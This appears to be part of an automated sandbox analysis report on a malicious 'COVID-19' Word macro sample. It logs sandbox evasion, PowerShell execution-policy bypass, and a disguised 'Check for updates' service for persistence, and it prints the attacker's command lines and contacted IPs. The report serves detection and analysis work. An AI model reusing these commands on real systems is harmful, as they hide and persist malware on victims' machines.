Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: COVID-19.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'ActiveDocument.Name' functions activedocument.name
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1556
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3107
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3050
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2366
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3951
Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1020Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2224Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2628Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe TID: 5776Thread sleep count: 75 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep count: 4578 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep count: 3951 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 5700Thread sleep count: 76 > 30
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
Source: powershell.exe, 00000002.00000002.706677063.0000000005224000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000004.00000003.765309047.00000000079B1000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.929256468.0000018322055000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000002.00000002.706677063.0000000005224000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpBinary or memory string: c:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1A2F LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C26BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.32.21 80
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 78.141.194.181 80
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.67.229.125 80
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)Show sources
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C2BAB OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc delete checkupdate
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc start checkupdate
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdate
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start checkupdate
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
